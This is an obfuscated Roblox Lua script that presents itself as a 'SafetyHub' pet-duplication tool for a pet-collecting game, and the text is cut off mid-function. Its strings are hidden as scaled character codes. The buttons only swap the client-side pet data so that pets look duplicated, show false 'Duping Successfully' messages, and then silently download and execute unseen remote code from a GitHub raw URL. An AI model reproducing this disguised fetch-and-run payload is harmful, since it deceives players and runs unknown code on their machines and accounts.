function UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW(code)res=''for i in ipairs(code)do res=res..string.char(code[i]/500)end return res end 


local Library = loadstring(game:HttpGet(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({52000,58000,58000,56000,57500,29000,23500,23500,56000,48500,57500,58000,50500,49000,52500,55000,23000,49500,55500,54500,23500,57000,48500,59500,23500,59000,51000,51000,24500,49000,40500,28500,35000})))()
local Window = Library.CreateLib(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,48500,51000,50500,58000,60500,36000,58500,49000,16000,43000,27000}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({38500,52500,50000,55000,52500,51500,52000,58000}))

--New Tab

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,58500,56000,52500,55000,51500,16000,36000,58500,51500,50500,113000,78000,66500}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,41500,48500,51000,50500,58000,36000,58500,49000,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,39000,48500,54500,50500,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,39000,48500,54500,50500});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({32500,54500,55500,58500,55000,58000,16000,39500,51000,16000,34000,58500,56000,50500,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({32500,54500,55500,58500,55000,58000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,33500,52000,48500,55000,51500,50500,57000}))

Section:NewToggle(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,55500,51500,51500,54000,50500,36500,55000,51000,55500}), function(state)
    if state then
        game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,41500,50500,58000,16000,42000,55500,16000,26000,24000,24000});
    })
    else
        game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,34000,52500,57500,48500,49000,54000,50500,50000});
    })
    end
end)

Section:NewButton(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58000,48500,57000,58000,16000,34000,58500,56000,52500,55000,51500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,58500,58000,58000,55500,55000,36500,55000,51000,55500}), function()
    local message = require(game.ReplicatedStorage.Library.Client.Message)
message.Error(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({44500,55500,58500,57000,16000,24500,16000,36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500,16000,36500,57500,16000,33000,50500,49500,55500,54500,50500,16000,24500,24500,16000,39000,55500,59500,22000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16000,32500,56000,56000,50500,48500,57000,16000,42000,55500,16000,44500,55500,58500,57000,16000,52500,55000,59000,50500,55000,58000,55500,57000,60500,23500,16000,34000,58500,56000,52500,55000,51500,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16000,113000,78000,66500}))
    
    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,55500,51500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33500,48500,58000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33500,55500,57000,51500,52500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,58500,55000,55000,60500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({32500,60000,55500,54000,55500,58000,54000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,48500,54000,54500,48500,58000,52500,48500,55000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33500,52000,52500,49500,53500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,58500,49500,53500,60500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34500,54000,50500,56000,52000,48500,55000,58000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,50500,50500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({36000,58500,51500,50500,16000,40000,50500,48500,49500,55500,49500,53500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    loadstring(game:HttpGet(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({52000,58000,58000,56000,57500,29000,23500,23500,57000,48500,59500,23000,51500,52500,58000,52000,58500,49000,58500,57500,50500,57000,49500,55500,55000,58000,50500,55000,58000,23000,49500,55500,54500,23500,58000,55500,49000,52500,26000,25500,27500,48500,23500,41500,49500,57000,52500,56000,58000,57500,23500,54500,48500,52500,55000,23500,24000,50500,27000,25000,27500,49000,51000,24500,25000,24500,50000,24500,28000,50000,50000,50500,24500,24500,48500,27000,27500,49000,24000,50000,23000,54000,58500,48500})))()
  end

)

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,52500,58000,48500,55000,52500,49500,16000,34000,58500,56000,52500,55000,51500,120000,79500,74000,82500}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,40000,57000,55500,50000,52500,51500,60500,38000,50500,51500,50500,55000,50000,57500,36000,40500,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,52500,58000,48500,55000,52500,49500,16000,39000,48500,54500,50500,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,52500,58000,48500,55000,52500,49500,16000,39000,48500,54500,50500});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,33500,52000,48500,55000,51500,50500,57000}))

Section:NewToggle(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,55500,51500,51500,54000,50500,36500,55000,51000,55500}), function(state)
    if state then
        game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,41500,50500,58000,16000,42000,55500,16000,26000,24000,24000});
    })
    else
        game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,34000,52500,57500,48500,49000,54000,50500,50000});
    })
    end
end)

Section:NewButton(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58000,48500,57000,58000,16000,34000,58500,56000,52500,55000,51500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,58500,58000,58000,55500,55000,36500,55000,51000,55500}), function()
    local message = require(game.ReplicatedStorage.Library.Client.Message)
message.Error(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,52500,58000,48500,55000,52500,49500,16000,33000,54000,48500,49500,53500,16000,36000,55500,54000,50500,16000,32500,55000,51500,50500,54000,58500,57500,16000,36500,57500,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16000,34000,58500,56000,50500,23500,16000,42000,52500,58000,48500,55000,52500,49500,16000,34000,58500,56000,52500,55000,51500,16000,34000,55500,55000,50500,120000,79500,74000,82500,120000,79500,74000,82500}))

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,55500,51500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,52500,58000,48500,55000,52500,49500,16000,33000,54000,48500,49500,53500,16000,36000,55500,54000,50500,16000,32500,55000,51500,50500,54000,58500,57500})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    loadstring(game:HttpGet(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({52000,58000,58000,56000,57500,29000,23500,23500,57000,48500,59500,23000,51500,52500,58000,52000,58500,49000,58500,57500,50500,57000,49500,55500,55000,58000,50500,55000,58000,23000,49500,55500,54500,23500,58000,55500,49000,52500,26000,25500,27500,48500,23500,41500,49500,57000,52500,56000,58000,57500,23500,54500,48500,52500,55000,23500,24000,50500,27000,25000,27500,49000,51000,24500,25000,24500,50000,24500,28000,50000,50000,50500,24500,24500,48500,27000,27500,49000,24000,50000,23000,54000,58500,48500})))()
  end

)

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35500,50500,54500,57500,16000,34000,58500,56000,52500,55000,51500,120000,79500,73000,71000}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,41500,48500,51000,50500,58000,60500,36000,58500,49000,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,60500,56000,50500,16000,44500,55500,58500,57000,16000,35500,50500,54500,57500,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({44500,55500,58500,57000,16000,35500,50500,54500,57500});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,60500,56000,50500,16000,32500,54500,55500,58500,55000,58000,16000,34000,58500,56000,50500,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({32500,54500,55500,58500,55000,58000,16000,34000,58500,56000,50500});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewButton(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58000,48500,57000,58000,16000,34000,58500,56000,52500,55000,51500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,58500,58000,58000,55500,55000,36500,55000,51000,55500}), function()
  end

)

local Tab = Window:NewTab(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,58500,56000,52500,55000,51500,16000,34500,60000,49500,54000,58500,57500,52500,59000,50500,16000,120000,79500,72000,88500}))
local Section = Tab:NewSection(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58500,49000,57500,49500,57000,52500,49000,50500,16000,42000,55500,16000,38500,60500,16000,33500,52000,48500,55000,55000,50500,54000}))

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,49500,57000,52500,56000,58000,16000,38500,48500,50000,50500,16000,33000,60500,16000,41500,48500,51000,50500,58000,60500,36000,58500,49000,16000,39500,55000,16000,44500,55500,58500,42000,58500,49000,50500}))

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34500,60000,49500,54000,58500,57500,52500,59000,50500,16000,39000,48500,54500,50500,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34500,60000,49500,54000,58500,57500,52500,59000,50500,16000,39000,48500,54500,50500});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewTextBox(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({32500,54500,55500,58500,55000,58000,16000,39500,51000,16000,34000,58500,56000,50500,16000,113000,78000,71500,119500,92000,71500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,50500,60000,58000,49000,55500,60000,36500,55000,51000,55500}), function(txt)
    game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({32500,54500,55500,58500,55000,58000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,58000,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16500});
    })
end)

Section:NewLabel(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,33500,52000,48500,55000,51500,50500,57000}))

Section:NewToggle(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42000,55500,51500,51500,54000,50500,36500,55000,51000,55500}), function(state)
    if state then
        game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,41500,50500,58000,16000,42000,55500,16000,26000,24000,24000});
    })
    else
        game.StarterGui:SetCore(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,50500,55000,50000,39000,55500,58000,52500,51000,52500,49500,48500,58000,52500,55500,55000}),{
        Title = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,120000,79500,74000,73000});
        Text = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({35000,40000,41500,16000,38000,55500,49500,53500,16000,34000,52500,57500,48500,49000,54000,50500,50000});
    })
    end
end)

Section:NewButton(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({41500,58000,48500,57000,58000,16000,34000,58500,56000,52500,55000,51500}), UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,58500,58000,58000,55500,55000,36500,55000,51000,55500}), function()
    local message = require(game.ReplicatedStorage.Library.Client.Message)
message.Error(UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({44500,55500,58500,57000,16000,25000,16000,42500,55000,52500,49500,55500,57000,55000,16000,42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000,16000,36500,57500,16000,33000,50500,49500,55500,54500,50500,16000,24500,24500,23500,16000,34000,58500,56000,52500,55000,51500,16000,41500,58500,49500,49500,50500,57500,57500,51000,58500,54000,54000,60500,16000,16000,113000,78000,66500}))
    
    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,55500,51500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33500,48500,58000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33500,55500,57000,51500,52500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,58500,55000,55000,60500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({32500,60000,55500,54000,55500,58000,54000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,48500,54000,54500,48500,58000,52500,48500,55000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33500,52000,52500,49500,53500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34000,58500,49500,53500,60500})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({34500,54000,50500,56000,52000,48500,55000,58000})
local toPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({42500,55000,52500,49500,55500,57000,55000,16000,34000,57000,48500,51500,55500,55000})

for i,v in pairs(lib.Directory.Pets[fromPet]) do
  lib.Directory.Pets[fromPet][i] = nil
end
for i,v in pairs(lib.Directory.Pets[toPet]) do
  lib.Directory.Pets[fromPet][i] = v
    end

    local lib = require(game.ReplicatedStorage.Library)

local fromPet = UdmVdRPDuVYUrQHAggJpfFiintvEBRfjUVRJW({33000,50500,50500})
